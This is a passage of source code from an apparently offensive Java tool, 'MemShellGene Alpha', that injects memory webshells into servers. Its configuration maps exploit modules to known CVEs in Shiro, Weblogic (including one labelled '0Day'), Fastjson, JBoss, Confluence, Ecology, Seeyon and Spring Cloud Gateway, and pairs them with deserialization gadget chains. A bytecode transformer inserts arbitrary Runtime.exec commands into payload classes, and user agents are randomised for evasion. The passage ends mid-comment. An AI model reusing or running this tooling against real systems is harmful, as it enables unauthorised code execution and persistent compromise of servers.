Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 43 | Util.messageQueue.add("---------------------------\n"); 44 | }else { 45 | Util.messageQueue.add("注入失败"); 46 | } 47 | 48 | }catch (Exception e){ 49 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 50 | } 51 | } 52 | 53 | @Override 54 | public void run(HashMap params) { 55 | String target = params.get("target"); 56 | 57 | String payloadType = params.get("payloadType"); 58 | String gadgetType = params.get("gadgetType"); 59 | String trojanType = params.get("trojanType"); 60 | String protocol = params.get("protocol"); 61 | String stripUrl = this.getStripUrl(target); 62 | this.attack(protocol, stripUrl, gadgetType, payloadType, trojanType); 63 | 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /src/main/java/ui/ComponentType.java: -------------------------------------------------------------------------------- 1 | package ui; 2 | 3 | public enum ComponentType { 4 | Shiro, 5 | Fastjson, 6 | JBoss, 7 | Weblogic, 8 | Confluence, 9 | Ecology, 10 | Seeyon, 11 | SpringGateWay, 12 | TongWeb 13 | 14 | 15 | } 16 | -------------------------------------------------------------------------------- /src/main/java/ui/Config.java: -------------------------------------------------------------------------------- 1 | package ui; 2 | 3 | import java.util.Arrays; 4 | import java.util.HashMap; 5 | import java.util.List; 6 | 7 | public class Config { 8 | 9 | public static List supportModules = Arrays.asList( 10 | "Shiro", 11 | "Weblogic", 12 | "Fastjson", 13 | "JBoss", 14 | "Confluence", 15 | "ECology", 16 | "Seeyon", 17 | "SpringGateWay" 18 | ); 19 | 20 | public static List serverNameList = Arrays.asList( 21 | "Tomcat", 22 | "TongWeb", 23 | "Weblogic", 24 | "Spring", 25 | "Netty", 26 | "JBoss", 27 | "Jetty", 28 | "Resin", 29 | "GlassFish", 30 | "WebSphere"); 31 | 32 | public static HashMap> moduleExps = new HashMap>(); 33 | 34 | 
static{ 35 | moduleExps.put("Shiro", Arrays.asList("550")); 36 | moduleExps.put("Weblogic", Arrays.asList("CVE_2020_14756", "CVE_2020_2883", "0Day_1", "CVE_2020_14883")); 37 | moduleExps.put("Fastjson", Arrays.asList("AutoType_ByPass")); 38 | moduleExps.put("JBoss", Arrays.asList("CVE_2017_12149", "CVE_2017_7504")); 39 | moduleExps.put("Confluence", Arrays.asList("CVE_2022_26134", "CVE_2021_26084")); 40 | moduleExps.put("ECology", Arrays.asList("BeanShell_RCE")); 41 | moduleExps.put("Seeyon", Arrays.asList("Unauthorized_RCE")); 42 | moduleExps.put("SpringGateWay", Arrays.asList("CVE_2022_22947")); 43 | 44 | } 45 | 46 | public static HashMap> moduleServers = new HashMap>(); 47 | 48 | static{ 49 | moduleServers.put("Shiro", serverNameList); 50 | moduleServers.put("Weblogic", Arrays.asList("Weblogic")); 51 | // moduleServers.put("Fastjson", serverNameList); 52 | moduleServers.put("Fastjson", Arrays.asList("Tomcat")); 53 | moduleServers.put("JBoss", Arrays.asList("JBoss")); 54 | moduleServers.put("Confluence", Arrays.asList("Tomcat")); 55 | moduleServers.put("ECology", Arrays.asList("Resin")); 56 | moduleServers.put("Seeyon", Arrays.asList("Tomcat")); 57 | moduleServers.put("SpringGateWay", Arrays.asList("Spring", "Netty")); 58 | 59 | } 60 | 61 | 62 | 63 | 64 | 65 | public static HashMap> serverComponent = new HashMap>(); 66 | static { 67 | serverComponent.put("Spring", Arrays.asList("Boot", "Controller", "Interceptor", "WebfluxHandler")); 68 | serverComponent.put("Tomcat", Arrays.asList("Filter", "Listener")); 69 | serverComponent.put("TongWeb", Arrays.asList("Filter", "Listener")); 70 | serverComponent.put("WebSphere", Arrays.asList("Filter")); 71 | serverComponent.put("Netty", Arrays.asList("Handler")); 72 | 73 | } 74 | 75 | public static List CommonsGadget = Arrays.asList( 76 | "All", 77 | "CommonsBeanutils1", 78 | "CommonsBeanutils1_183", 79 | "CommonsBeanutilsAttrCompare", 80 | "CommonsBeanutilsAttrCompare_183", 81 | "CommonsBeanutilsObjectToStringComparator", 82 
| "CommonsBeanutilsObjectToStringComparator_183", 83 | "CommonsBeanutilsPropertySource", 84 | "CommonsBeanutilsPropertySource_183", 85 | "CommonsBeanutilsString", 86 | "CommonsBeanutilsString_183", 87 | "CommonsBeanutilsString_192s", 88 | "CommonsCollections5", 89 | "CommonsCollections6", 90 | "CommonsCollectionsK1", 91 | "CommonsCollectionsK2", 92 | "Jdk7u21", 93 | "Spring1", 94 | "C3P0" 95 | ); 96 | 97 | public static HashMap> gadGetMap = new HashMap>(); 98 | static { 99 | gadGetMap.put("Shiro_550", CommonsGadget); 100 | gadGetMap.put("JBoss_CVE_2017_12149", CommonsGadget); 101 | gadGetMap.put("JBoss_CVE_2017_7504", CommonsGadget); 102 | // gadGetMap.put("Weblogic_CVE_2016_3510", CommonsGadget); 103 | gadGetMap.put("Weblogic_CVE_2020_14756", Arrays.asList("Weblogic_CVE_2020_14756")); 104 | gadGetMap.put("Weblogic_0Day_1", Arrays.asList("Weblogic_0Day_JDK7")); 105 | gadGetMap.put("Weblogic_CVE_2020_2883", Arrays.asList("Weblogic_CVE_2020_2883")); 106 | gadGetMap.put("Weblogic_CVE_2020_14883", Arrays.asList("Weblogic_CVE_2020_14883")); 107 | gadGetMap.put("Fastjson_AutoType_ByPass", Arrays.asList("Fastjson_AutoType_ByPass")); 108 | gadGetMap.put("Confluence_CVE_2021_26084", Arrays.asList("Confluence_CVE_2021_26084")); 109 | gadGetMap.put("Confluence_CVE_2022_26134", Arrays.asList("Confluence_CVE_2022_26134")); 110 | gadGetMap.put("ECology_BeanShell_RCE", Arrays.asList("ECology_BeanShell_RCE")); 111 | gadGetMap.put("Seeyon_Unauthorized_RCE", Arrays.asList("Seeyon_Unauthorized_RCE")); 112 | gadGetMap.put("SpringGateWay_CVE_2022_22947", Arrays.asList("SpringGateWay_CVE_2022_22947")); 113 | } 114 | 115 | public static HashMap> protocolMap = new HashMap>(); 116 | static { 117 | protocolMap.put("Shiro_550", Arrays.asList("http")); 118 | protocolMap.put("JBoss_CVE_2017_12149", Arrays.asList("http")); 119 | protocolMap.put("JBoss_CVE_2017_7504", Arrays.asList("http")); 120 | protocolMap.put("Weblogic_CVE_2020_14756",Arrays.asList("t3", "iiop")); 121 | // 
protocolMap.put("Weblogic_CVE_2020_14756",Arrays.asList("t3", "iiop", "t3s")); 122 | protocolMap.put("Weblogic_0Day_1", Arrays.asList("t3", "iiop")); 123 | // protocolMap.put("Weblogic_0Day_1", Arrays.asList("t3", "iiop", "t3s")); 124 | protocolMap.put("Weblogic_CVE_2020_2883", Arrays.asList("t3", "iiop")); 125 | // protocolMap.put("Weblogic_CVE_2020_2883", Arrays.asList("t3", "iiop", "t3s")); 126 | protocolMap.put("Weblogic_CVE_2020_14883", Arrays.asList("http")); 127 | protocolMap.put("Fastjson_AutoType_ByPass", Arrays.asList("http")); 128 | protocolMap.put("Confluence_CVE_2021_26084", Arrays.asList("http")); 129 | protocolMap.put("Confluence_CVE_2022_26134", Arrays.asList("http")); 130 | protocolMap.put("ECology_BeanShell_RCE", Arrays.asList("http")); 131 | protocolMap.put("Seeyon_Unauthorized_RCE", Arrays.asList("http")); 132 | protocolMap.put("SpringGateWay_CVE_2022_22947", Arrays.asList("http")); 133 | } 134 | 135 | } 136 | -------------------------------------------------------------------------------- /src/main/java/ui/Main.java: -------------------------------------------------------------------------------- 1 | package ui; 2 | 3 | import javafx.application.Application; 4 | import javafx.fxml.FXMLLoader; 5 | import javafx.scene.Parent; 6 | import javafx.scene.Scene; 7 | import javafx.stage.Stage; 8 | import utils.SystemInfo; 9 | 10 | public class Main extends Application { 11 | 12 | @Override 13 | public void start(Stage primaryStage) throws Exception{ 14 | if (SystemInfo.isMacOS && System.getProperty("apple.laf.useScreenMenuBar") == null) 15 | System.setProperty("apple.laf.useScreenMenuBar", "true"); 16 | System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true"); 17 | Parent root = FXMLLoader.load(getClass().getResource("/sample.fxml")); 18 | primaryStage.setTitle("MemShellGene Alpha"); 19 | primaryStage.setResizable(false); 20 | primaryStage.setScene(new Scene(root, 1190, 600)); 21 | primaryStage.show(); 22 | 23 | } 24 | 25 | 
26 | 27 | public static void main(String[] args) { 28 | launch(args); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /src/main/java/utils/MessagePrintBase.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | public class MessagePrintBase implements Runnable { 4 | 5 | public String readMessage() { 6 | return Util.messageQueue.poll(); 7 | } 8 | 9 | @Override 10 | public void run() { 11 | 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /src/main/java/utils/SystemInfo.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | import java.util.Locale; 4 | import java.util.StringTokenizer; 5 | 6 | public class SystemInfo { 7 | public static final boolean isWindows; 8 | 9 | public static final boolean isMacOS; 10 | 11 | public static final boolean isLinux; 12 | 13 | static { 14 | String osName = System.getProperty("os.name").toLowerCase(Locale.ENGLISH); 15 | isWindows = osName.startsWith("windows"); 16 | isMacOS = osName.startsWith("mac"); 17 | isLinux = osName.startsWith("linux"); 18 | } 19 | 20 | public static final long osVersion = scanVersion(System.getProperty("os.version")); 21 | 22 | public static final boolean isWindows_10_orLater = (isWindows && osVersion >= toVersion(10, 0, 0, 0)); 23 | 24 | public static final boolean isMacOS_10_11_ElCapitan_orLater = (isMacOS && osVersion >= toVersion(10, 11, 0, 0)); 25 | 26 | public static final boolean isMacOS_10_14_Mojave_orLater = (isMacOS && osVersion >= toVersion(10, 14, 0, 0)); 27 | 28 | public static final boolean isMacOS_10_15_Catalina_orLater = (isMacOS && osVersion >= toVersion(10, 15, 0, 0)); 29 | 30 | public static final long javaVersion = scanVersion(System.getProperty("java.version")); 31 | 32 | public static final boolean isJava_9_orLater = (javaVersion >= toVersion(9, 0, 0, 0)); 33 | 34 | 
public static final boolean isJava_11_orLater = (javaVersion >= toVersion(11, 0, 0, 0)); 35 | 36 | public static final boolean isJava_15_orLater = (javaVersion >= toVersion(15, 0, 0, 0)); 37 | 38 | public static final boolean isJetBrainsJVM = System.getProperty("java.vm.vendor", "Unknown") 39 | .toLowerCase(Locale.ENGLISH).contains("jetbrains"); 40 | 41 | public static final boolean isJetBrainsJVM_11_orLater = (isJetBrainsJVM && isJava_11_orLater); 42 | 43 | public static final boolean isKDE = (isLinux && System.getenv("KDE_FULL_SESSION") != null); 44 | 45 | public static long scanVersion(String version) { 46 | int major = 1; 47 | int minor = 0; 48 | int micro = 0; 49 | int patch = 0; 50 | try { 51 | StringTokenizer st = new StringTokenizer(version, "._-+"); 52 | major = Integer.parseInt(st.nextToken()); 53 | minor = Integer.parseInt(st.nextToken()); 54 | micro = Integer.parseInt(st.nextToken()); 55 | patch = Integer.parseInt(st.nextToken()); 56 | } catch (Exception exception) {} 57 | return toVersion(major, minor, micro, patch); 58 | } 59 | 60 | public static long toVersion(int major, int minor, int micro, int patch) { 61 | return (major << 48L) + (minor << 32L) + (micro << 16L) + patch; 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /src/main/java/utils/SystemPrintMessage.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | public class SystemPrintMessage extends MessagePrintBase{ 4 | 5 | public SystemPrintMessage(){} 6 | 7 | public void run(){ 8 | while (true){ 9 | String message = this.readMessage(); 10 | if (message != null) { 11 | System.out.println(message); 12 | } 13 | } 14 | } 15 | 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/utils/TextAreaPrintMessage.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | 4 | import 
javafx.scene.control.TextArea; 5 | 6 | import java.io.UnsupportedEncodingException; 7 | 8 | public class TextAreaPrintMessage extends MessagePrintBase{ 9 | 10 | private TextArea jTextArea; 11 | 12 | public TextAreaPrintMessage(TextArea jTextArea){ 13 | this.jTextArea = jTextArea; 14 | } 15 | 16 | public void run(){ 17 | while (true){ 18 | String message = this.readMessage(); 19 | if (message != null) { 20 | try { 21 | this.jTextArea.appendText(new String(message.getBytes("UTF-8"), "utf-8")); 22 | } catch (UnsupportedEncodingException e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /src/main/java/utils/Transformers.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | import java.io.InputStream; 4 | import org.objectweb.asm.*; 5 | 6 | 7 | /** 8 | * @Classname Transformers 9 | * @Description Insert command to the template classfile 10 | * @Author Welkin 11 | */ 12 | public class Transformers { 13 | 14 | public static byte[] insertCommand(InputStream inputStream, String command) throws Exception{ 15 | 16 | ClassReader cr = new ClassReader(inputStream); 17 | ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES); 18 | ClassVisitor cv = new TransformClass(cw,command); 19 | 20 | cr.accept(cv, 2); 21 | return cw.toByteArray(); 22 | } 23 | 24 | static class TransformClass extends ClassVisitor{ 25 | 26 | String command; 27 | 28 | TransformClass(ClassVisitor classVisitor, String command){ 29 | super(Opcodes.ASM7,classVisitor); 30 | this.command = command; 31 | } 32 | 33 | @Override 34 | public MethodVisitor visitMethod( 35 | final int access, 36 | final String name, 37 | final String descriptor, 38 | final String signature, 39 | final String[] exceptions) { 40 | MethodVisitor mv = cv.visitMethod(access, name, descriptor, signature, exceptions); 41 | if(name.equals("")){ 42 | return new 
TransformMethod(mv,command); 43 | }else{ 44 | return mv; 45 | } 46 | } 47 | } 48 | 49 | static class TransformMethod extends MethodVisitor{ 50 | 51 | String command; 52 | 53 | TransformMethod(MethodVisitor methodVisitor,String command) { 54 | super(Opcodes.ASM7, methodVisitor); 55 | this.command = command; 56 | } 57 | 58 | @Override 59 | public void visitCode(){ 60 | 61 | Label label0 = new Label(); 62 | Label label1 = new Label(); 63 | Label label2 = new Label(); 64 | mv.visitTryCatchBlock(label0, label1, label2, "java/lang/Exception"); 65 | mv.visitLabel(label0); 66 | mv.visitLdcInsn(command); 67 | mv.visitVarInsn(Opcodes.ASTORE, 0); 68 | mv.visitMethodInsn(Opcodes.INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false); 69 | mv.visitVarInsn(Opcodes.ALOAD, 0); 70 | mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/Runtime", "exec", "(Ljava/lang/String;)Ljava/lang/Process;", false); 71 | mv.visitInsn(Opcodes.POP); 72 | mv.visitLabel(label1); 73 | Label label3 = new Label(); 74 | mv.visitJumpInsn(Opcodes.GOTO, label3); 75 | mv.visitLabel(label2); 76 | mv.visitVarInsn(Opcodes.ASTORE, 0); 77 | mv.visitVarInsn(Opcodes.ALOAD, 0); 78 | mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/Exception", "printStackTrace", "()V", false); 79 | mv.visitLabel(label3); 80 | } 81 | } 82 | 83 | } 84 | -------------------------------------------------------------------------------- /src/main/java/utils/UserAgentUtil.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | import java.util.ArrayList; 4 | import java.util.List; 5 | import java.util.Random; 6 | 7 | public class UserAgentUtil { 8 | private static List list = new ArrayList(); 9 | 10 | static { 11 | list.add("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"); 12 | list.add("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 
Safari/537.36"); 13 | list.add("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"); 14 | list.add("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"); 15 | list.add("Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"); 16 | list.add("Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"); 17 | list.add("Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0"); 18 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"); 19 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"); 20 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"); 21 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"); 22 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)"); 23 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)"); 24 | list.add("Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"); 25 | list.add("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2"); 26 | list.add("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/525.28.3"); 27 | list.add("Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16"); 28 | list.add("Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"); 29 | list.add("Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14"); 30 | list.add("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) 
Opera 12.14"); 31 | list.add("Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02"); 32 | list.add("Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"); 33 | list.add("Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00"); 34 | list.add("Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00"); 35 | list.add("Opera/12.0(Windows NT 5.1;U;en)Presto/22.9.168 Version/12.00"); 36 | list.add("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"); 37 | list.add("Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"); 38 | list.add("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"); 39 | list.add("Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0"); 40 | list.add("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0"); 41 | list.add("Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"); 42 | } 43 | 44 | private static int getRandomIndex() { 45 | int max = 31; 46 | int min = 0; 47 | Random random = new Random(); 48 | return random.nextInt(max) % (max - min + 1) + min; 49 | } 50 | 51 | public static String getRandomUserAgent(){ 52 | return list.get(getRandomIndex()); 53 | } 54 | 55 | } -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/OkHttpProxyInterceptor.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import okhttp3.Interceptor; 4 | import okhttp3.Response; 5 | 6 | import java.io.IOException; 7 | 8 | 9 | public class OkHttpProxyInterceptor implements Interceptor 10 | { 11 | private ProxyConfig proxyConfig; 12 | private ThreadLocalProxyAuthenticator authenticator = ThreadLocalProxyAuthenticator.getInstance(); 13 | 14 | public OkHttpProxyInterceptor(ProxyConfig proxyConfig) 15 | { 16 | this.proxyConfig = proxyConfig; 17 | } 18 | 19 | @Override 20 | public Response 
intercept(Chain chain) throws IOException 21 | { 22 | boolean clearCredentials = false; 23 | if (proxyConfig != null) 24 | { 25 | if (proxyConfig.getAuthentication() != null) 26 | { 27 | authenticator.setCredentials(proxyConfig.getAuthentication()); 28 | clearCredentials = true; 29 | } 30 | } 31 | 32 | try 33 | { 34 | return chain.proceed(chain.request()); 35 | } 36 | finally 37 | { 38 | if (clearCredentials) 39 | { 40 | ThreadLocalProxyAuthenticator.clearCredentials(); 41 | } 42 | } 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/ProxyConfig.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import java.net.InetSocketAddress; 4 | import java.net.PasswordAuthentication; 5 | import java.net.Proxy; 6 | 7 | 8 | public class ProxyConfig 9 | { 10 | private String proxyType = null; 11 | private String proxyHost = null; 12 | private int proxyPort = 0; 13 | private String userName = null; 14 | private String passWord = null; 15 | 16 | public ProxyConfig(String proxyType, String proxyHost, int proxyPort) 17 | { 18 | this.proxyType = proxyType; 19 | this.proxyHost = proxyHost; 20 | this.proxyPort = proxyPort; 21 | } 22 | 23 | public ProxyConfig(String proxyType, String proxyHost, int proxyPort, String userName, String passWord) 24 | { 25 | this.proxyType = proxyType; 26 | this.proxyHost = proxyHost; 27 | this.proxyPort = proxyPort; 28 | this.userName = userName; 29 | this.passWord = passWord; 30 | } 31 | 32 | public Proxy getProxy() 33 | { 34 | Proxy proxy = null; 35 | if (proxyType.equalsIgnoreCase("http")) 36 | { 37 | proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyHost, proxyPort)); 38 | } 39 | if (proxyType.equalsIgnoreCase("socks5") || proxyType.equalsIgnoreCase("socks4")) 40 | { 41 | proxy = new Proxy(Proxy.Type.SOCKS, new InetSocketAddress(proxyHost, proxyPort)); 42 | } 43 | 44 | return proxy; 45 | } 
46 | 47 | public String getProxyType() 48 | { 49 | return proxyType; 50 | } 51 | 52 | public String getUserName() 53 | { 54 | return userName; 55 | } 56 | 57 | public String getPassWord() 58 | { 59 | return passWord; 60 | } 61 | 62 | public PasswordAuthentication getAuthentication() 63 | { 64 | if (userName != null && passWord != null) 65 | { 66 | return new PasswordAuthentication(userName, passWord.toCharArray()); 67 | } 68 | else 69 | { 70 | return null; 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/ProxySSLSocketFactory.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import javax.net.ssl.SSLSocketFactory; 4 | import java.io.IOException; 5 | import java.net.InetAddress; 6 | import java.net.InetSocketAddress; 7 | import java.net.Proxy; 8 | import java.net.Socket; 9 | 10 | 11 | public class ProxySSLSocketFactory extends SSLSocketFactory 12 | { 13 | private ProxyConfig proxyConfig; 14 | private SSLSocketFactory socketFactory; 15 | 16 | public ProxySSLSocketFactory(ProxyConfig proxyConfig, SSLSocketFactory socketFactory) 17 | { 18 | this.proxyConfig = proxyConfig; 19 | this.socketFactory = socketFactory; 20 | } 21 | 22 | @Override 23 | public String[] getDefaultCipherSuites() 24 | { 25 | return socketFactory.getDefaultCipherSuites(); 26 | } 27 | 28 | @Override 29 | public String[] getSupportedCipherSuites() 30 | { 31 | return socketFactory.getSupportedCipherSuites(); 32 | } 33 | 34 | @Override 35 | public Socket createSocket() throws IOException 36 | { 37 | Proxy proxy = proxyConfig.getProxy(); 38 | if (proxy != null) 39 | { 40 | return new Socket(proxy); 41 | } 42 | else 43 | { 44 | return new Socket(); 45 | } 46 | } 47 | 48 | @Override 49 | public Socket createSocket(String host, int port) throws IOException 50 | { 51 | Socket socket = createSocket(); 52 | try 53 | { 54 | return 
socketFactory.createSocket(socket, host, port, true); 55 | } 56 | catch (IOException e) 57 | { 58 | socket.close(); 59 | throw e; 60 | } 61 | } 62 | 63 | @Override 64 | public Socket createSocket(Socket s, String host, int port, boolean autoClose) throws IOException 65 | { 66 | // ��Ϊ�������һ���Ѿ����õ�socket�������޷����� 67 | return socketFactory.createSocket(s, host, port, autoClose); 68 | } 69 | 70 | @Override 71 | public Socket createSocket(InetAddress address, int port) throws IOException 72 | { 73 | Socket socket = createSocket(); 74 | try 75 | { 76 | return socketFactory.createSocket(socket, address.getHostAddress(), port, true); 77 | } 78 | catch (IOException e) 79 | { 80 | socket.close(); 81 | throw e; 82 | } 83 | } 84 | 85 | @Override 86 | public Socket createSocket(String host, int port, InetAddress clientAddress, int clientPort) throws IOException 87 | { 88 | Socket socket = createSocket(); 89 | try 90 | { 91 | socket.bind(new InetSocketAddress(clientAddress, clientPort)); 92 | return socketFactory.createSocket(socket, host, port, true); 93 | } 94 | catch (IOException e) 95 | { 96 | socket.close(); 97 | throw e; 98 | } 99 | } 100 | 101 | @Override 102 | public Socket createSocket(InetAddress address, int port, InetAddress clientAddress, int clientPort) throws IOException 103 | { 104 | Socket socket = createSocket(); 105 | try 106 | { 107 | socket.bind(new InetSocketAddress(clientAddress, clientPort)); 108 | return socketFactory.createSocket(socket, address.getHostAddress(), port, true); 109 | } 110 | catch (IOException e) 111 | { 112 | socket.close(); 113 | throw e; 114 | } 115 | } 116 | } -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/ProxySocketFactory.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import javax.net.SocketFactory; 4 | import java.io.IOException; 5 | import java.net.*; 6 | 7 | 8 | public class 
ProxySocketFactory extends SocketFactory 9 | { 10 | private ProxyConfig proxyConfig; 11 | 12 | public ProxySocketFactory(ProxyConfig proxyConfig) 13 | { 14 | this.proxyConfig = proxyConfig; 15 | } 16 | 17 | @Override 18 | public Socket createSocket() throws IOException 19 | { 20 | Proxy proxy = proxyConfig.getProxy(); 21 | if (proxy != null) 22 | { 23 | return new Socket(proxy); 24 | } 25 | else 26 | { 27 | return new Socket(); 28 | } 29 | } 30 | 31 | @Override 32 | public Socket createSocket(String host, int port) throws IOException, UnknownHostException 33 | { 34 | Socket socket = createSocket(); 35 | try 36 | { 37 | socket.connect(new InetSocketAddress(host, port)); 38 | } 39 | catch (IOException e) 40 | { 41 | socket.close(); 42 | throw e; 43 | } 44 | return socket; 45 | } 46 | 47 | @Override 48 | public Socket createSocket(InetAddress address, int port) throws IOException 49 | { 50 | Socket socket = createSocket(); 51 | try 52 | { 53 | socket.connect(new InetSocketAddress(address, port)); 54 | } 55 | catch (IOException e) 56 | { 57 | socket.close(); 58 | throw e; 59 | } 60 | return socket; 61 | } 62 | 63 | @Override 64 | public Socket createSocket(String host, int port, InetAddress clientAddress, int clientPort) 65 | throws IOException, UnknownHostException 66 | { 67 | Socket socket = createSocket(); 68 | try 69 | { 70 | socket.bind(new InetSocketAddress(clientAddress, clientPort)); 71 | socket.connect(new InetSocketAddress(host, port)); 72 | } 73 | catch (IOException e) 74 | { 75 | socket.close(); 76 | throw e; 77 | } 78 | return socket; 79 | } 80 | 81 | @Override 82 | public Socket createSocket(InetAddress address, int port, InetAddress clientAddress, int clientPort) throws IOException 83 | { 84 | Socket socket = createSocket(); 85 | try 86 | { 87 | socket.bind(new InetSocketAddress(clientAddress, clientPort)); 88 | socket.connect(new InetSocketAddress(address, port)); 89 | } 90 | catch (IOException e) 91 | { 92 | socket.close(); 93 | throw e; 94 | } 95 | 
return socket; 96 | } 97 | 98 | 99 | 100 | } 101 | -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/ThreadLocalProxyAuthenticator.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import java.net.Authenticator; 4 | import java.net.PasswordAuthentication; 5 | 6 | 7 | public class ThreadLocalProxyAuthenticator extends Authenticator 8 | { 9 | private ThreadLocal credentials = null; 10 | private static class SingletonHolder 11 | { 12 | private static final ThreadLocalProxyAuthenticator instance = new ThreadLocalProxyAuthenticator(); 13 | } 14 | 15 | public static final ThreadLocalProxyAuthenticator getInstance() 16 | { 17 | return SingletonHolder.instance; 18 | } 19 | 20 | public void setCredentials(PasswordAuthentication passAuth) 21 | { 22 | credentials.set(passAuth); 23 | } 24 | 25 | public static void clearCredentials() 26 | { 27 | ThreadLocalProxyAuthenticator authenticator = ThreadLocalProxyAuthenticator.getInstance(); 28 | Authenticator.setDefault(authenticator); 29 | authenticator.credentials.set(null); 30 | } 31 | 32 | @Override 33 | public PasswordAuthentication getPasswordAuthentication() 34 | { 35 | return credentials.get(); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/TyrRequestBody.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import okhttp3.internal.Util; 4 | import okhttp3.MediaType; 5 | import okhttp3.RequestBody; 6 | import okio.BufferedSink; 7 | import okio.BufferedSource; 8 | import okio.Okio; 9 | 10 | import java.io.File; 11 | import java.io.IOException; 12 | import java.nio.charset.Charset; 13 | import java.util.Arrays; 14 | 15 | 16 | public class TyrRequestBody { 17 | 18 | public static RequestBody create(MediaType contentType, String content, int 
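chunkCount) throws Exception {
        // Same charset handling as OkHttp's RequestBody.create(MediaType, String): honour the
        // charset declared in the media type, otherwise default to UTF-8 and announce it.
        Charset charset = Util.UTF_8;
        if (contentType != null) {
            charset = contentType.charset();
            if (charset == null) {
                charset = Util.UTF_8;
                contentType = MediaType.parse(contentType + "; charset=utf-8");
            }
        }

        byte[] bytes = content.getBytes(charset);
        return create(contentType, bytes, chunkCount);
    }

    /**
     * Body that writes {@code content} in pieces of at most {@code chunkCount} bytes, flushing
     * after each piece. An empty {@code content} still produces one empty write and flush.
     * <p>
     * Fix: {@code chunkCount == 0} used to spin forever (the end index never advanced); it is
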